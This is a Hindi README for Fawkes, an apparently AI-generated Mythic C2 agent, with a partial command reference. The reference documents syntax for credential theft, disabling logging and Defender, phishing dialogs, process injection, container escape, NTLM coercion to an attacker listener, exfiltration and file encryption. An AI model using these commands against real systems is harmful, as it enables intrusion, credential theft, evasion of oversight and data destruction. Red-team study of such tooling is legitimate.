
Fawkes एक golang Mythic C2 Agent है जो पूरी तरह से AI द्वारा लिखा गया है।
Fawkes एक पूरी तरह से वाइब-कोडेड Mythic C2 एजेंट है। यह एक "मुझे आश्चर्य है" के रूप में शुरू हुआ और एक लक्ष्य में बदल गया है। मेरा लक्ष्य इस एजेंट के लिए एक भी लाइन कोड नहीं लिखना है, बल्कि इसे विशेष रूप से एक प्रॉम्प्ट पर तैयार करना है।
मैंने मूल रूप से स्वयं एजेंट लिखने का प्रयास किया, लेकिन उदाहरण कंटेनर को क्लोन करने, mythic दस्तावेज़ पढ़ने, डेव सीरीज़ YouTube वीडियो देखने, और Merlin या Freyja जैसे अन्य एजेंटों से कोड कॉपी करने के बाद, मैंने तय किया कि मेरे पास अपना स्वयं का एजेंट विकसित करने का समय नहीं है। हालांकि एक प्रॉम्प्ट, उसके लिए मेरे पास समय है।
Fawkes एक golang-आधारित एजेंट है जिसमें क्रॉस-प्लेटफ़ॉर्म क्षमताएँ हैं। यह Windows (EXE, DLL, और शेलकोड पेलोड), Linux (ELF बाइनरी और साझा लाइब्रेरीज़), और macOS (Intel और Apple Silicon के लिए Mach-O बाइनरी) का समर्थन करता है। कुल 213 कमांड: 113 क्रॉस-प्लेटफ़ॉर्म, 82 केवल Windows, 21 केवल Unix, 11 केवल Linux, और 6 केवल macOS (कुछ कमांड में प्लेटफ़ॉर्म-विशिष्ट कार्यान्वयन होते हैं जो एक ही उपयोगकर्ता-सामना वाले नाम साझा करते हैं, जैसे screenshot)। आंतरिक पिवोटिंग के लिए HTTP एग्रेस और TCP पीयर-टू-पीयर (P2P) लिंकिंग का समर्थन करता है।
Fawkes को स्थापित करने के लिए, आपको एक दूरस्थ कंप्यूटर पर Mythic स्थापित करने की आवश्यकता होगी। आप Mythic प्रोजेक्ट पेज पर Mythic के लिए स्थापना निर्देश पा सकते हैं।
Mythic स्थापना निर्देशिका से:``` ./mythic-cli install github https://github.com/galoryber/fawkes
## कमांड्स त्वरित संदर्भCommand | Syntax | Description
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | Active Directory ऑब्जेक्ट DACLs पढ़ें/संशोधित करें (ACEs जोड़ें/हटाएं, DCSync, GenericAll, बैकअप/रीस्टोर दें)। क्रॉस-प्लेटफ़ॉर्म (T1222.001, T1098, T1003.006)।
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | AD प्रमाणपत्र सेवाएं गणना करें, संवेदनशील टेम्पलेट खोजें (ESC1-ESC4, DCOM के माध्यम से ESC6), DCOM के माध्यम से ESC1/ESC6 शोषण के लिए प्रमाणपत्र अनुरोध करें, या स्वचालित शोषण (खोजें → पार्स करें → अनुरोध श्रृंखला)। क्रॉस-प्लेटफ़ॉर्म (T1649)।
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(केवल विंडोज)** NTFS वैकल्पिक डेटा स्ट्रीम प्रबंधित करें — छिपे हुए डेटा स्ट्रीम लिखें, पढ़ें, सूचीबद्ध करें या हटाएं। टेक्स्ट और हेक्स-एन्कोडेड बाइनरी का समर्थन करता है। MITRE T1564.004।
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | फोरेंसिक निष्पादन कलाकृतियों को क्वेरी और साफ करें। विंडोज: Shimcache. लिनक्स: recently-used.xbel, थंबनेल, Tracker. मैकओएस: हाल की वस्तुएं, KnowledgeC, क्वारंटीन (T1070.004)।
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(केवल विंडोज)** रिमोट प्रक्रिया इंजेक्शन। `-method apc` (डिफ़ॉल्ट) NtQueueApcThread के माध्यम से शेलकोड को एक सतर्क थ्रेड में कतारबद्ध करता है (एक खोजने के लिए `ts` का उपयोग करें)। `-method hwbp` DebugActiveProcess के माध्यम से जुड़ता है, एक लक्ष्य API पर एक DR0 हार्डवेयर ब्रेकपॉइंट सेट करता है (डिफ़ॉल्ट `ntdll!NtDelayExecution`), और ब्रेकपॉइंट फायर होने पर Rip को शेलकोड पर रीडायरेक्ट करता है — कोई TID आवश्यक नहीं, कोई APC कतार नहीं, कोई CreateRemoteThread नहीं (T1055.004, T1055)।
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | माइक्रोफोन से ऑडियो रिकॉर्ड करें और WAV फ़ाइल अपलोड करें। विंडोज (waveIn), लिनक्स (arecord/parecord), मैकओएस (rec/ffmpeg). क्रॉस-प्लेटफ़ॉर्म (T1123)।
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(केवल विंडोज)** विंडोज ऑडिट नीतियों को क्वेरी और संशोधित करें। संवेदनशील संचालन से पहले सुरक्षा ईवेंट लॉगिंग अक्षम करें। स्टेल्थ मोड डिटेक्शन-महत्वपूर्ण उपश्रेणियों को अक्षम करता है। AuditQuerySystemPolicy API का उपयोग करता है (T1562.002)।
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(केवल विंडोज)** स्पूफ़ किए गए प्रक्रिया तर्कों के साथ एक कमांड निष्पादित करें। Sysmon Event ID 1 और EDR कमांड-लाइन टेलीमेट्री को विफल करता है (T1564.010)।
arp | `arp [-ip <subnet>]` or `arp -action spoof -target <IP> -gateway <IP>` | फ़िल्टरिंग के साथ ARP तालिका प्रदर्शित करें, या MITM स्थिति के लिए ARP कैश विषाक्तता (T1557.002). स्पूफ़: केवल लिनक्स, सफाई पर पुनर्स्थापित करता है।
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | बिना पूर्व-प्रमाणीकरण वाले खातों के लिए AS-REP टिकट का अनुरोध करें और ऑफ़लाइन क्रैकिंग के लिए हैशकैट प्रारूप में हैश निकालें। LDAP के माध्यम से स्वचालित गणना। क्रॉस-प्लेटफ़ॉर्म (T1558.004)।
av-detect | `av-detect [-deep true]` | 130+ हस्ताक्षर डेटाबेस के विरुद्ध चल रही प्रक्रियाओं को स्कैन करके स्थापित AV/EDR/सुरक्षा उत्पादों का पता लगाएं। `--deep` के साथ, स्थापित-लेकिन-चालू-नहीं उत्पादों के लिए कर्नेल मॉड्यूल, systemd यूनिट्स और कॉन्फिग डायरेक्टरी की भी जांच करता है (लिनक्स)। उत्पाद, विक्रेता, प्रकार और PID रिपोर्ट करता है। क्रॉस-प्लेटफ़ॉर्म।
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(केवल विंडोज)** निकटतम रिटर्न (C3) निर्देश पर कूदकर स्वचालित रूप से एक फ़ंक्शन को पैच करें। AMSI/ETW बायपास के लिए उपयोगी।
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | डेटा एन्कोडिंग टूलकिट: base64, XOR (स्ट्रिंग/हेक्स कुंजी के साथ), हेक्स, ROT13, URL प्रतिशत-एन्कोडिंग, सीज़र सिफर। सभी फ़ाइल I/O का समर्थन करते हैं। क्रॉस-प्लेटफ़ॉर्म (T1132.001, T1140, T1027)।
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(केवल विंडोज)** स्थिरता और गुप्त फ़ाइल डाउनलोड के लिए BITS स्थानांतरण कार्य प्रबंधित करें। कार्य बनाएं, निलंबित करें, फिर से शुरू करें, पूर्ण करें और स्थिरता के लिए अधिसूचना कमांड सेट करें। कार्य रिबूट से बचे रहते हैं (T1197)।
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | Chromium, Firefox और Safari से ब्राउज़र डेटा एकत्र करें। इतिहास, ऑटोफिल, बुकमार्क, डाउनलोड क्रॉस-प्लेटफ़ॉर्म। पासवर्ड: Chromium (DPAPI/Keychain/GNOME Keyring), Firefox (key4.db NSS डिक्रिप्शन), Safari (macOS Keychain)। सभी प्लेटफ़ॉर्म पर Firefox कुकीज़। MITRE T1555.003, T1217।
cat | `cat <file>` or `cat -path <file> -start N -end N -number true` | वैकल्पिक पंक्ति श्रेणी, क्रमांकन और 5MB आकार सुरक्षा के साथ फ़ाइल सामग्री प्रदर्शित करें।
cd | `cd <directory>` | वर्तमान कार्यशील निर्देशिका बदलें।
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | ऑक्टल (755, 644) या प्रतीकात्मक (+x, u+rw, go-w) संकेतन के साथ फ़ाइल/निर्देशिका अनुमतियाँ संशोधित करें। पुनरावर्ती समर्थन। क्रॉस-प्लेटफ़ॉर्म (T1222)।
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(केवल लिनक्स/मैकओएस)** उपयोगकर्ता नाम/UID और समूह नाम/GID द्वारा फ़ाइल/निर्देशिका स्वामित्व बदलें। पुनरावर्ती समर्थन (T1222)।
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | रिमोट होस्ट पर TLS प्रमाणपत्रों का निरीक्षण करें — CA, स्व-हस्ताक्षरित प्रमाणपत्र, समाप्ति, SANs, TLS संस्करण, सिफर सूट और SHA256 फिंगरप्रिंट की पहचान करता है। क्रॉस-प्लेटफ़ॉर्म (T1590.001)।
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(केवल विंडोज)** कोड साइनिंग प्रमाणपत्र, क्लाइंट प्रमाणीकरण प्रमाणपत्र और निजी कुंजी खोजने के लिए विंडोज प्रमाणपत्र स्टोर गणना करें। CurrentUser और LocalMachine खोजता है। MITRE T1552.004, T1649।
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | क्लिपबोर्ड पढ़ें/लिखें या क्रेडेंशियल पैटर्न पहचान के साथ परिवर्तनों की लगातार निगरानी करें। क्रॉस-प्लेटफ़ॉर्म (T1115)।
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | क्लाउड मेटाडेटा, क्रेडेंशियल निष्कर्षण, IAM गणना, स्टोरेज गणना, स्थिरता और गुप्त स्टोर एक्सेस। storage/aws-s3/azure-blob/gcp-gcs: नमूना ऑब्जेक्ट के साथ बकेट/कंटेनर गणना। aws-ssm: डिक्रिप्शन के साथ SSM पैरामीटर स्टोर। azure-keyvault: प्रबंधित पहचान के माध्यम से Key Vault रहस्य। gcp-secrets: सेवा खाते के माध्यम से सीक्रेट मैनेजर। aws-persist/azure-persist: दीर्घकालिक एक्सेस कुंजी/ऐप पंजीकरण बनाएं। स्वचालित पहचान। IMDSv2. क्रॉस-प्लेटफ़ॉर्म (T1552.005, T1580, T1530, T1098.001)।
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | आर्काइव बनाएं, सूचीबद्ध करें, निकालें, स्टेज या एक्सफिल करें। Stage AES-256-GCM के साथ एन्क्रिप्ट करता है। Exfil Mythic को स्थानांतरित करता है। exfil-https: चंक्ड अपलोड, कस्टम हेडर, जिटर के साथ S3/Azure/GCS प्री-साइन URL पर अपलोड करें। exfil-github: GitHub कंटेंट API के माध्यम से एक्सफिल करें। क्रॉस-प्लेटफ़ॉर्म (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001)।
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | MS-EFSR (PetitPotam), MS-RPRN (PrinterBug), MS-FSRVP (ShadowCoerce) के माध्यम से NTLM प्रमाणीकरण ज़बरदस्ती। लक्ष्य को अटैकर लिसनर पर प्रमाणित करने के लिए मजबूर करता है। पास-द-हैश समर्थन। क्रॉस-प्लेटफ़ॉर्म (T1187)।
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | रनटाइम एजेंट कॉन्फ़िगरेशन देखें या संशोधित करें, या एजेंट बाइनरी को स्वयं-अपडेट करें। `show`/`set`: sleep, jitter, kill date, कार्य घंटे। `update`: Mythic से नया पेलोड डाउनलोड करें, सत्यापित करें, लॉन्च करें और वर्तमान एजेंट से बाहर निकलें। क्रॉस-प्लेटफ़ॉर्म (T1105)।
container-detect | `container-detect` | कंटेनर रनटाइम और वातावरण का पता लगाएं (Docker, K8s, LXC, Podman, WSL)। डॉकर सॉकेट और K8s सेवा खातों जैसे एस्केप वैक्टर की जांच करता है। क्रॉस-प्लेटफ़ॉर्म (T1082, T1497.001)।
container-escape | `container-escape -action <check\|docker-sock\|cgroup\|nsenter\|mount-host\|k8s-enum\|k8s-secrets\|k8s-rbac\|k8s-nodes\|k8s-etcd\|k8s-deploy\|k8s-exec> [-command '<cmd>'] [-path <ns>\|<ns1,ns2,...>\|*] [-kubeconfig /path/to/config]` | **(केवल लिनक्स)** कंटेनर ब्रेकआउट + K8s ऑपरेशन — डॉकर सॉकेट, cgroup, nsenter, होस्ट डिवाइस माउंट। K8s: पॉड/सेवाएं गणना करें, रहस्य पढ़ें, **k8s-rbac**: ClusterRole/RoleBinding स्वीप + विशेषाधिकार-वृद्धि पथ स्कोरिंग (crit/warn/info), **k8s-nodes**: क्लस्टर नोड हमला सतह (kubelet/OS/kernel/CIDR/taints/roles), **k8s-etcd**: कंट्रोल-प्लेन पॉड आर्ग्स से etcd क्लाइंट एंडपॉइंट खोजें + प्रति एंडपॉइंट अनप्रमाणित `/version` जांच (अनप्रमाणित पढ़ना = पूर्ण क्लस्टर समझौता), API के माध्यम से पॉड डिफ़ॉइ/एक्सेक करें। **आउट-ऑफ-क्लस्टर**: `-kubeconfig` चुराए गए kubeconfig फ़ाइलों को स्वीकार करता है (गैर-कंटेनर होस्ट से K8s एक्सेस के लिए) (T1611, T1610, T1613, T1552.007, T1069.003, T1087.004)।
cp | `cp <source> <destination>` | किसी फ़ाइल को स्रोत से गंतव्य पर कॉपी करें।
cred-check | `cred-check [-action check\|verify-all] -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-timeout <seconds>]` | लक्ष्य होस्ट पर SMB, WinRM और LDAP के विरुद्ध क्रेडेंशियल का परीक्षण करें। `verify-all` सभी वॉल्ट क्रेडेंशियल्स का समानांतर में खोजे गए होस्ट के विरुद्ध परीक्षण करता है। क्रॉस-प्लेटफ़ॉर्म (T1110.001, T1078)।
cred-harvest | `cred-harvest -action <shadow\|cloud\|configs\|history\|windows\|m365-tokens\|browser-live\|all\|dump-all> [-user <username>]` | क्रेडेंशियल एकत्र करें: छाया हैश (Unix), क्लाउड कॉन्फ़िग (AWS/GCP/Azure/K8s), एप्लिकेशन रहस्य, लीक पासवर्ड/टोकन/API कुंजी के लिए शेल हिस्ट्री स्कैनिंग, पावरशेल हिस्ट्री + एनवी वेर + RDP (विंडोज), TokenBroker/Teams/Outlook से M365 OAuth/JWT टोकन (विंडोज), **browser-live**: चल रहे Chrome/Edge से Chrome DevTools Protocol (CDP) के माध्यम से लाइव कुकीज़, localStorage, sessionStorage चुराएं। **dump-all**: स्वचालित उपकार्य श्रृंखला — hashdump + lsa-secrets + cred-harvest सभी समानांतर में चलाता है (विंडोज). क्रॉस-प्लेटफ़ॉर्म (T1552, T1003.008, T1528, T1539)।
credential-prompt | `credential-prompt [-action dialog\|device-code\|mfa-phish] [-title "Authentication Required"] [-message "Enter your credentials..."] [-icon caution]` | मूल क्रेडेंशियल डायलॉग प्रदर्शित करें, OAuth डिवाइस कोड फ़्लो का दुरुपयोग करें, या MFA कोड फ़िश करें। dialog: macOS AppleScript, विंडोज CredUI, लिनक्स zenity/kdialog. device-code: टोकन कैप्चर के लिए Azure AD OAuth डिवाइस कोड फ़्लो। mfa-phish: TOTP कोड कैप्चर करने के लिए नकली MFA सत्यापन डायलॉग। क्रॉस-प्लेटफ़ॉर्म (T1056.002, T1621, T1111)।
curl | `curl -url <URL> [-method GET\|PUT\|POST] [-file <path>] [-upload raw\|multipart] [-headers '{"K":"V"}'] [-body <data>]` | HTTP अनुरोध + फ़ाइल अपलोड एक्सफिल्ट्रेशन (T1567). S3 प्री-साइन URL, Azure SAS, सामान्य एंडपॉइंट पर अपलोड करें। क्रॉस-प्लेटफ़ॉर्म (T1106, T1567.002)।
cut | `cut -path <file> -delimiter <char> -fields <1,3\|1-3\|2-> [-chars <1-10>]` | फ़ाइल पंक्तियों से फ़ील्ड या वर्ण श्रेणियाँ निकालें। कस्टम डिलीमीटर, रेंज स्पेक। क्रॉस-प्लेटफ़ॉर्म (T1083)।
credman | `credman [-action <list\|dump\|vault>] [-filter <pattern>]` | प्लेटफ़ॉर्म क्रेडेंशियल स्टोर गणना करें। विंडोज: क्रेडेंशियल मैनेजर + वॉल्ट (CredEnumerateW, vaultcli.dll). लिनक्स: GNOME कीरिंग (secret-tool), KDE KWallet, NetworkManager WiFi/VPN पासवर्ड, GNOME ऑनलाइन खाते। macOS: कीचेन आइटम (सामान्य + इंटरनेट पासवर्ड), WiFi पासवर्ड। `list`=मेटाडेटा, `dump`=रहस्यों के साथ, `vault`=केवल विंडोज। MITRE T1555.004, T1555.001.
defender | `defender -action <status\|exclusions\|add-exclusion\|remove-exclusion\|threats\|enable\|disable> [-type <path\|process\|extension>] [-value <val>]` | **(केवल विंडोज)** डिफेंडर प्रबंधित करें — स्थिति, अपवाद, खतरे, रीयल-टाइम सुरक्षा सक्षम/अक्षम करें। MITRE T1562.001.
dpapi | `dpapi -action <decrypt\|masterkeys\|chrome-key> [-blob <base64>] [-entropy <base64>]` | **(केवल विंडोज)** DPAPI ब्लॉब डिक्रिप्शन (CryptUnprotectData), मास्टर की गणना, Chrome/Edge एन्क्रिप्शन की निकासी। MITRE T1555.003/T1555.005.
email | `email -action <count\|search\|read\|folders> [-folder <name>] [-query <keyword>] [-index <n>]` | **(केवल विंडोज)** COM के माध्यम से आउटलुक मेलबॉक्स एक्सेस करें। संदेश गिनें, कीवर्ड द्वारा खोजें, अनुक्रमणिका द्वारा पढ़ें, फ़ोल्डर सूचीबद्ध करें। MITRE T1114.001.
dcom | `dcom -action <exec\|upload\|exec-staged\|check> -host <target> -command <cmd> [-args <arguments>] [-object mmc20\|shellwindows\|shellbrowser\|wscript\|excel\|outlook]` | **(केवल विंडोज)** DCOM के माध्यम से रिमोट होस्ट पर कमांड निष्पादित करें, फ़ाइलें अपलोड करें, या स्टेज-एंड-एक्ज़ीक्यूट करें। `check` RPC/DCOM पूर्वापेक्षाएँ मान्य करता है। upload: certutil/PowerShell स्टेजिंग के माध्यम से फ़ाइलें स्थानांतरित करें। exec-staged: ऑटो-क्लीनअप के साथ अपलोड करें फिर निष्पादित करें। छह COM ऑब्जेक्ट। MITRE T1021.003, T1570.
debug-detect | `debug-detect` | संलग्न डीबगर्स, विश्लेषण उपकरण और इंस्ट्रुमेंटेशन का पता लगाएं। विंडोज: IsDebuggerPresent, NtQueryInformationProcess, PEB, DR रजिस्टर। लिनक्स: TracerPid, LD_PRELOAD, मेमोरी मैप (Frida/Valgrind/sanitizers), VM/sandbox, eBPF निगरानी (Falco/Tetragon/Tracee), auditd फ्रेमवर्क, ptrace स्कोप। macOS: sysctl P_TRACED, DYLD_INSERT_LIBRARIES, VM डिटेक्शन (sysctl), सुरक्षा उत्पाद (EDR/AV), सैंडबॉक्स/विश्लेषण वातावरण। सभी: डीबगर प्रक्रिया स्कैन (T1497.001)।
dcsync | `dcsync [-action sync\|domain-takeover] -server <DC> -username <user> [-password <pass>] [-hash <NT hash>] [-target <account[,account2]>]` | DCSync — LSASS को छुए बिना DRS के माध्यम से AD क्रेडेंशियल्स को प्रतिकृति करें। `domain-takeover` kerberoast + asrep-roast + dcsync krbtgt/Administrator समानांतर में चलाता है। क्रॉस-प्लेटफ़ॉर्म (T1003.006)।
df | `df [-filesystem <device>] [-mount_point <path>] [-fstype <type>]` | वैकल्पिक डिवाइस, माउंट पॉइंट या fstype फ़िल्टरिंग के साथ फ़ाइलसिस्टम डिस्क स्थान उपयोग रिपोर्ट करें। क्रॉस-प्लेटफ़ॉर्म (T1082)।
diff | `diff -file1 <path> -file2 <path> [-context <n>]` | दो फ़ाइलों की तुलना करें और एकीकृत diff प्रारूप में अंतर दिखाएं। LCS-आधारित एल्गोरिथम कॉन्फ़िगरेबल संदर्भ पंक्तियों के साथ। क्रॉस-प्लेटफ़ॉर्म (T1083)।
dns | `dns -action <resolve\|reverse\|srv\|mx\|ns\|txt\|cname\|all\|dc\|zone-transfer\|wildcard\|exfil\|doh> -target <host> [-server <dns_ip>]` | DNS गणना — होस्ट हल करें, रिकॉर्ड क्वेरी करें, DC खोजें, ज़ोन ट्रांसफर, वाइल्डकार्ड डिटेक्शन, DNS-ओवर-HTTPS स्टील्थ रिज़ॉल्यूशन, DNS एक्सफिल्ट्रेशन। क्रॉस-प्लेटफ़ॉर्म (T1018, T1071.004, T1048.001)।
du | `du -path <file_or_dir> [-max_depth <n>]` | फ़ाइलों और निर्देशिकाओं के लिए डिस्क उपयोग रिपोर्ट करें। उपनिर्देशिका द्वारा आकार विवरण, सबसे बड़े द्वारा क्रमबद्ध। क्रॉस-प्लेटफ़ॉर्म (T1083)।
drivers | `drivers [-filter <name>]` | लोडेड कर्नेल ड्राइवर/मॉड्यूल गणना करें। विंडोज: EnumDeviceDrivers, लिनक्स: /proc/modules, macOS: kext गणना। क्रॉस-प्लेटफ़ॉर्म (T1082)।
domain-policy | `domain-policy -action <all\|password\|lockout\|fgpp> -server <DC> -username <user@domain> -password <pass>` | LDAP के माध्यम से AD पासवर्ड/लॉकआउट नीति और FGPP गणना। स्प्रे-सुरक्षित सुझाव। क्रॉस-प्लेटफ़ॉर्म (T1201)।
crontab | `crontab -action <list\|add\|remove> [-entry <cron_line>] [-program <path>] [-schedule <schedule>]` | **(केवल लिनक्स/मैकओएस)** स्थिरता के लिए क्रॉन जॉब सूचीबद्ध करें, जोड़ें या हटाएं। रॉ क्रॉन एंट्री या प्रोग्राम+शेड्यूल सिंटैक्स का समर्थन करता है।
download | `download <path>` or `download {"path": "/file", "compress": true}` | लक्ष्य से कोई फ़ाइल या निर्देशिका डाउनलोड करें। 1MB से बड़ी फ़ाइलें स्वचालित रूप से gzip के साथ संपीड़ित होती हैं (कॉन्फ़िगरेबल)। निर्देशिकाएं स्वचालित रूप से ज़िप की जाती हैं। SHA256 हैश सत्यापन। चंक्ड ट्रांसफर, फ़ाइल ब्राउज़र एकीकरण।
drives | `drives` | प्रकार, लेबल/डिवाइस और मुक्त/कुल स्थान के साथ उपलब्ध ड्राइव/वॉल्यूम और माउंटेड फ़ाइलसिस्टम सूचीबद्ध करें।
enum-tokens | `enum-tokens [-action list\|unique] [-user <filter>]` | **(केवल विंडोज)** सभी प्रक्रियाओं में एक्सेस टोकन गणना करें। `list` प्रत्येक प्रक्रिया के लिए PID/user/integrity/session दिखाता है। `unique` प्रक्रिया गणना के साथ उपयोगकर्ता द्वारा समूहित करता है। स्वचालित रूप से SeDebugPrivilege सक्षम करता है (T1134, T1057)।
encrypt | `encrypt -action <encrypt\|decrypt\|encrypt-files\|decrypt-files\|corrupt\|corrupt-files> -path <file_or_glob> [-key <base64key>] [-confirm SIMULATE\|CORRUPT]` | AES-256-GCM एन्क्रिप्शन/डिक्रिप्शन (T1486) + लक्षित फ़ाइल भ्रष्टाचार (T1565). corrupt: फ़ाइल हेडर को यादृच्छिक डेटा से ओवरराइट करें। विनाशकारी ऑप्स के लिए सुरक्षा गेट आवश्यक है।
env | `env [-action <list\|get\|set\|unset>] [-name <VAR>] [-value <val>] [-filter <pattern>]` | एजेंट प्रक्रिया के लिए पर्यावरण चर सूचीबद्ध करें, प्राप्त करें, सेट करें या अनसेट करें। परिवर्तन चाइल्ड प्रक्रियाओं द्वारा विरासत में मिलते हैं। क्रॉस-प्लेटफ़ॉर्म।
env-scan | `env-scan [-pid <PID>] [-filter <pattern>]` | लीक क्रेडेंशियल्स, API कुंजी और रहस्यों के लिए प्रक्रिया पर्यावरण चर स्कैन करें। क्लाउड, डेटाबेस, CI/CD और क्रिप्टो श्रेणियों में 35+ डिटेक्शन पैटर्न। लिनक्स + macOS (T1057, T1552.001)।
etw | `etw -action <sessions\|rules\|agents\|patch\|restore\|blind-all\|...> [-session_name <name>] [-provider <guid\|shorthand>]` | **(विंडोज, लिनक्स, मैकओएस)** ऑडिट/टेलीमेट्री सबसिस्टम हेरफेर। विंडोज: ETW सेशन/प्रोवाइडर स्टॉप/ब्लाइंड/ब्लाइंड-ऑल/इनेबल/पैच/रीस्टोर। लिनक्स: auditd नियम, journald क्लियर/रोटेट, syslog कॉन्फिग, SIEM एजेंट डिटेक्शन। macOS: यूनिफाइड लॉगिंग, सुरक्षा एजेंट डिटेक्शन। (T1562, T1070.002)।
eventlog | `eventlog -action <list\|query\|clear\|info\|enable\|disable> [-channel <name\|unit\|subsystem\|path>] [-event_id <id>] [-filter <xpath\|keyword\|timewindow>] [-count <max>]` | सिस्टम ईवेंट लॉग प्रबंधित करें। विंडोज: wevtapi.dll चैनल। लिनक्स: journald यूनिट और syslog फ़ाइलें। macOS: यूनिफाइड लॉगिंग (os_log) सबसिस्टम/प्रक्रियाएं। स्रोत सूचीबद्ध करें, ईवेंट क्वेरी करें, लॉग साफ़/वैक्यूम करें, जानकारी प्राप्त करें। MITRE T1070.001, T1562.002.
execute-memory | `execute-memory -arguments 'arg1 arg2' -timeout 60` | मेमोरी से एक मूल बाइनरी निष्पादित करें। लिनक्स: memfd_create (कोई डिस्क लेखन नहीं)। macOS: एड-हॉक कोडसाइन के साथ अस्थायी फ़ाइल। विंडोज: तत्काल सफाई के साथ अस्थायी फ़ाइल। सभी प्लेटफ़ॉर्म निष्पादन के बाद कलाकृतियाँ हटाते हैं। MITRE T1620.
execute-shellcode | `execute-shellcode [-technique mmap\|memfd] [-encoding none\|xor\|aes] [-key hex]` | वर्तमान प्रक्रिया में शेलकोड निष्पादित करें। रनटाइम डिकोडिंग के साथ XOR/AES-256-CTR एन्कोडेड शेलकोड का समर्थन करता है (T1027). विंडोज: VirtualAlloc + CreateThread. लिनक्स: mmap (डिफ़ॉल्ट) या memfd_create. macOS: MAP_JIT (ARM64) या mmap. क्रॉस-प्लेटफ़ॉर्म (T1059.006, T1620).
exit | `exit` | एजेंट को बाहर निकलने का कार्य देता है।
file-attr | `file-attr -path <file> [-attrs "+hidden,-readonly,+immutable"]` | फ़ाइल विशेषताएँ प्राप्त या सेट करें — hidden, readonly, system (विंडोज); immutable, append, nodump (लिनक्स); hidden, immutable (macOS). -attrs छोड़ें वर्तमान फ़्लैग देखने के लिए। क्रॉस-प्लेटफ़ॉर्म (T1564.001, T1222)।
file-type | `file-type -path <file_or_dir> [-recursive true] [-max_files 100]` | मैजिक बाइट्स (35+ हस्ताक्षर) द्वारा फ़ाइल प्रकार पहचानें। एकल फ़ाइल या निर्देशिका स्कैनिंग। एक्जीक्यूटेबल, आर्काइव, दस्तावेज़, इमेज, डेटाबेस, मीडिया और अधिक का पता लगाता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
find | `find -pattern <glob> [-path <dir>] [-min_size <bytes>] [-max_size <bytes>] [-newer <min>] [-older <min>] [-type f\|d] [-perm suid\|sgid\|writable\|executable\|<octal>] [-owner <user\|uid>]` | नाम, आकार, दिनांक, अनुमतियाँ या स्वामी द्वारा फ़ाइलें खोजें। SUID बाइनरी, विश्व-लेखन योग्य फ़ाइलें, विशिष्ट उपयोगकर्ताओं के स्वामित्व वाली फ़ाइलें खोजें। क्रॉस-प्लेटफ़ॉर्म (T1083)।
find-admin | `find-admin -hosts <targets> -username <user> -password <pass> [-method smb\|winrm\|both] [-hash <NT>] [-action scan\|auto-move] [-lateral_method psexec\|wmi] [-lateral_command <cmd>]` | होस्ट स्वीप करें यह पता लगाने के लिए कि SMB (C$ शेयर) और/या WinRM के माध्यम से क्रेडेंशियल्स का एडमिन एक्सेस कहाँ है। **auto-move**: स्वचालित उपकार्य श्रृंखला — एडमिन होस्ट खोजें फिर psexec/wmi के माध्यम से प्रत्येक पर पार्श्व रूप से जाएं। CIDR, IP रेंज, PTH, समानांतर स्कैनिंग का समर्थन करता है (T1021.002, T1021.006)।
firewall | `firewall -action <list\|add\|delete\|enable\|disable\|status\|pf-add\|pf-delete\|pf-list> [-name <rule>] [-direction <in\|out>] [-protocol <tcp\|udp\|any>] [-port <port>]` | **(विंडोज, मैकओएस, लिनक्स)** फ़ायरवॉल नियम प्रबंधित करें। विंडोज: COM API. macOS: ALF + pf एंकर किए गए नियम। लिनक्स: iptables/nftables (स्वचालित रूप से पहचाना गया)। macOS पैकेट फ़िल्टरिंग के लिए PF एंकर समर्थन। MITRE T1562.004.
getprivs | `getprivs -action list\|enable\|disable\|strip [-privilege <name>]` | **(विंडोज, मैकओएस, लिनक्स)** विशेषाधिकार/क्षमताएं सूचीबद्ध करें। विंडोज: सक्षम/अक्षम/स्ट्रिप के साथ टोकन विशेषाधिकार। लिनक्स: प्रक्रिया क्षमताएं (CapEff/CapPrm) + SELinux/AppArmor संदर्भ। macOS: एंटाइटलमेंट, सैंडबॉक्स, समूह (T1134.002)।
